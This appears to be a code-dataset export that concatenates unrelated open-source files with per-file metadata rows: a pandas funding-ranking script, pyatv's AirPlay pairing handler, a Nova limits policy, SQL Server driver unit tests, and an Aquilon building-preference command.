# Highest-Funded Organizations
# ------------------------------------------------------------------------------------------------
top = 250
top_orgs = funding[(funding['StartYear'].astype(float) >= 2010) & (funding['StartYear'].astype(float) < 2016)].groupby(
['OrganizationName', 'OrganizationBlock', 'StartYear'])['NormalizedAmount'].sum().reset_index()
# Get the Top Funded Orgs for Each Year
# Sort by Year and Amount
top_orgs_sorted = top_orgs.sort_values(['StartYear', 'NormalizedAmount'], ascending=[False, False]).reset_index(
drop=True)
# Get the top x per year
by_year = top_orgs_sorted.sort_values('NormalizedAmount', ascending=False).groupby('StartYear', as_index=False).head(
top)
# Sort
by_year_sorted = by_year.sort_values(['StartYear', 'NormalizedAmount'], ascending=[False, False]).reset_index(drop=True)
# Add Ranking (will only work for certian values of top)
by_year_sorted['Ranking'] = list(range(1, top + 1)) * int(round(by_year_sorted.shape[0] / top))
# Rename
by_year_sorted.columns = ['Name', 'Country', 'Start Year', 'Total Grants (USD)', 'Ranking']
# Format Money (see http://stackoverflow.com/a/3393776/4898004)
by_year_sorted['Total Grants (USD)'] = by_year_sorted['Total Grants (USD)'].map(lambda x: '{:20,.2f}'.format(x).strip())
# Reorder
by_year_sorted = by_year_sorted[['Ranking', 'Name', 'Country', 'Start Year', 'Total Grants (USD)']]
by_year_sorted.to_csv(MAIN_FOLDER + "analysis/resources/" + '2010_2015_rankings_detailed.csv', index=False)
|
gpl-3.0
| -1,514,281,424,299,409,700
| 39.169014
| 120
| 0.542426
| false
| 3.737877
| false
| false
| false
|
postlund/pyatv
|
pyatv/airplay/pairing.py
|
1
|
3297
|
"""Device pairing and derivation of encryption keys."""
import binascii
import logging
from typing import Optional
from pyatv import conf, exceptions
from pyatv.airplay.auth import AirPlayPairingProcedure
from pyatv.airplay.srp import LegacyCredentials, SRPAuthHandler, new_credentials
from pyatv.const import Protocol
from pyatv.interface import PairingHandler
from pyatv.support import error_handler
from pyatv.support.http import ClientSessionManager, HttpConnection, http_connect
_LOGGER = logging.getLogger(__name__)
class AirPlayPairingHandler(PairingHandler):
"""Base class for API used to pair with an Apple TV."""
def __init__(
self, config: conf.AppleTV, session_manager: ClientSessionManager, _
) -> None:
"""Initialize a new MrpPairingHandler."""
super().__init__(session_manager, config.get_service(Protocol.AirPlay))
self.http: Optional[HttpConnection] = None
self.address: str = str(config.address)
self.pairing_procedure: Optional[AirPlayPairingProcedure] = None
self.credentials: LegacyCredentials = self._setup_credentials()
self.pin_code: Optional[str] = None
self._has_paired: bool = False
def _setup_credentials(self) -> LegacyCredentials:
# If service has credentials, use those. Otherwise generate new.
if self.service.credentials is None:
return new_credentials()
return LegacyCredentials.parse(self.service.credentials)
@property
def has_paired(self) -> bool:
"""If a successful pairing has been performed."""
return self._has_paired
async def close(self) -> None:
"""Call to free allocated resources after pairing."""
await super().close()
if self.http:
self.http.close()
async def begin(self) -> None:
"""Start pairing process."""
_LOGGER.debug("Starting AirPlay pairing with credentials %s", self.credentials)
srp: SRPAuthHandler = SRPAuthHandler(self.credentials)
srp.initialize()
self.http = await http_connect(self.address, self.service.port)
self.pairing_procedure = AirPlayPairingProcedure(self.http, srp)
self._has_paired = False
return await error_handler(
self.pairing_procedure.start_pairing, exceptions.PairingError
)
async def finish(self) -> None:
"""Stop pairing process."""
if not self.pairing_procedure:
raise exceptions.PairingError("pairing was not started")
if not self.pin_code:
raise exceptions.PairingError("no pin given")
self.service.credentials = str(
await error_handler(
self.pairing_procedure.finish_pairing,
exceptions.PairingError,
binascii.hexlify(self.credentials.identifier).decode("ascii").upper(),
self.pin_code,
)
)
self._has_paired = True
def pin(self, pin: int) -> None:
"""Pin code used for pairing."""
self.pin_code = str(pin).zfill(4)
_LOGGER.debug("AirPlay PIN changed to %s", self.pin_code)
@property
def device_provides_pin(self) -> bool:
"""Return True if remote device presents PIN code, else False."""
return True
|
mit
| 1,528,977,526,204,508,200
| 35.633333
| 87
| 0.657264
| false
| 4.157629
| false
| false
| false
|
klmitch/nova
|
nova/policies/limits.py
|
1
|
2189
|
# Copyright 2016 Cloudbase Solutions Srl
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_policy import policy
from nova.policies import base
BASE_POLICY_NAME = 'os_compute_api:limits'
OTHER_PROJECT_LIMIT_POLICY_NAME = 'os_compute_api:limits:other_project'
DEPRECATED_POLICY = policy.DeprecatedRule(
'os_compute_api:os-used-limits',
base.RULE_ADMIN_API,
)
DEPRECATED_REASON = """
Nova API policies are introducing new default roles with scope_type
capabilities. Old policies are deprecated and silently going to be ignored
in nova 23.0.0 release.
"""
limits_policies = [
policy.DocumentedRuleDefault(
name=BASE_POLICY_NAME,
check_str=base.RULE_ANY,
description="Show rate and absolute limits for the current user "
"project",
operations=[
{
'method': 'GET',
'path': '/limits'
}
],
scope_types=['system', 'project']),
policy.DocumentedRuleDefault(
name=OTHER_PROJECT_LIMIT_POLICY_NAME,
check_str=base.SYSTEM_READER,
description="""Show rate and absolute limits of other project.
This policy only checks if the user has access to the requested
project limits. And this check is performed only after the check
os_compute_api:limits passes""",
operations=[
{
'method': 'GET',
'path': '/limits'
}
],
scope_types=['system'],
deprecated_rule=DEPRECATED_POLICY,
deprecated_reason=DEPRECATED_REASON,
deprecated_since='21.0.0'),
]
def list_rules():
return limits_policies
|
apache-2.0
| -8,685,073,734,015,824,000
| 30.724638
| 78
| 0.660576
| false
| 4.083955
| false
| false
| false
|
scm-spain/slippin-jimmy
|
tests/slippinj/databases/drivers/test_sqlserver.py
|
1
|
5305
|
import logging
from mock import Mock
from slippinj.databases.drivers.sqlserver import Sqlserver
class TestSqlserver:
def setup_method(self, method):
self.logger = logging.getLogger('test')
self.logger.addHandler(logging.NullHandler())
def teardown_method(self, method):
self.logger = None
def test_get_tables_info_when_no_table_list_is_provided(self):
mocked_table_list_query_cursor = Mock()
mocked_table_list_query_cursor.execute = Mock(return_value=True)
mocked_table_list_query_cursor.fetchall = Mock(return_value=[{'table_name': 'unit'}, {'table_name': 'test'}])
mocked_table_count_query_cursor = Mock()
mocked_table_count_query_cursor.execute = Mock(return_value=True)
mocked_table_count_query_cursor.fetchone = Mock(return_value=[10])
columns = {
'table_name': '',
'column_name': 'column',
'data_type': 'string',
'character_maximum_length': '1',
'is_nullable': 'NO',
'column_default': ''
}
tables_columns = []
columns.update(table_name='unit')
tables_columns.append(columns.copy())
columns.update(table_name='test')
tables_columns.append(columns.copy())
mocked_table_columns_query_cursor = Mock()
mocked_table_columns_query_cursor.execute = Mock(return_value=True)
mocked_table_columns_query_cursor.fetchall = Mock(return_value=tables_columns)
mocked_table_top_query_cursor = Mock()
mocked_table_top_query_cursor.execute = Mock(return_value=True)
mocked_table_top_query_cursor.fetchall = Mock(return_value=[])
mocked_mssql = Mock()
mocked_mssql.cursor = Mock(side_effect=[mocked_table_list_query_cursor, mocked_table_count_query_cursor,
mocked_table_columns_query_cursor, mocked_table_top_query_cursor])
mocked_builder = Mock()
mocked_builder.build = Mock(return_value=mocked_mssql)
expected = {'tables': {'test': {'columns': [{'character_maximum_length': '1',
'column_default': '',
'column_name': 'column',
'data_type': 'string',
'is_nullable': 'NO'}],
'count': 10,
'rows': []},
'unit': {'columns': [{'character_maximum_length': '1',
'column_default': '',
'column_name': 'column',
'data_type': 'string',
'is_nullable': 'NO'}],
'count': 10,
'rows': []}},
'db_connection_string': 'jdbc:sqlserver://test'
}
assert expected == Sqlserver(mocked_builder, self.logger, db_host = 'test').get_all_tables_info(None, None, None)
def test_get_tables_info_when_table_list_has_been_provided(self):
mocked_table_count_query_cursor = Mock()
mocked_table_count_query_cursor.execute = Mock(return_value=True)
mocked_table_count_query_cursor.fetchone = Mock(return_value=[10])
columns = {
'table_name': '',
'column_name': 'column',
'data_type': 'string',
'character_maximum_length': '1',
'is_nullable': 'NO',
'column_default': ''
}
tables_columns = []
columns.update(table_name='unit')
tables_columns.append(columns.copy())
columns.update(table_name='test')
tables_columns.append(columns.copy())
mocked_table_columns_query_cursor = Mock()
mocked_table_columns_query_cursor.execute = Mock(return_value=True)
mocked_table_columns_query_cursor.fetchall = Mock(return_value=tables_columns)
mocked_table_top_query_cursor = Mock()
mocked_table_top_query_cursor.execute = Mock(return_value=True)
mocked_table_top_query_cursor.fetchall = Mock(return_value=[])
mocked_mssql = Mock()
mocked_mssql.cursor = Mock(side_effect=[mocked_table_count_query_cursor,
mocked_table_columns_query_cursor, mocked_table_top_query_cursor])
mocked_builder = Mock()
mocked_builder.build = Mock(return_value=mocked_mssql)
expected = {'tables': {
'unit': {'columns': [{'character_maximum_length': '1',
'column_default': '',
'column_name': 'column',
'data_type': 'string',
'is_nullable': 'NO'}],
'count': 10,
'rows': []}},
'db_connection_string': 'jdbc:sqlserver://test'
}
assert expected == Sqlserver(mocked_builder, self.logger, db_host = 'test').get_all_tables_info('unit', None, None)
|
apache-2.0
| 7,177,636,296,262,225,000
| 45.535088
| 123
| 0.514986
| false
| 4.355501
| true
| false
| false
|
guillaume-philippon/aquilon
|
lib/aquilon/worker/commands/update_building_preference.py
|
1
|
2073
|
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2016,2017 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Contains the logic for `aq update building preference`. """
from aquilon.aqdb.model import BuildingPreference, Building
from aquilon.worker.broker import BrokerCommand
from aquilon.worker.dbwrappers.change_management import validate_prod_archetype
from aquilon.worker.dbwrappers.cluster import get_clusters_by_locations
class CommandUpdateBuildingPreference(BrokerCommand):
requires_plenaries = True
required_parameters = ["building_pair", "archetype"]
def render(self, session, logger, plenaries, building_pair, archetype,
prefer, justification, reason, user, **_):
db_pref = BuildingPreference.get_unique(session,
building_pair=building_pair,
archetype=archetype,
compel=True)
db_pref.lock_row()
validate_prod_archetype(db_pref.archetype, user, justification, reason, logger)
for db_clus in get_clusters_by_locations(session, (db_pref.a, db_pref.b),
db_pref.archetype):
plenaries.add(db_clus)
if prefer:
dbbuilding = Building.get_unique(session, prefer, compel=True)
db_pref.prefer = dbbuilding
session.flush()
plenaries.write(verbose=True)
return
|
apache-2.0
| 5,816,525,462,180,406,000
| 38.865385
| 87
| 0.655572
| false
| 4.064706
| false
| false
| false
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.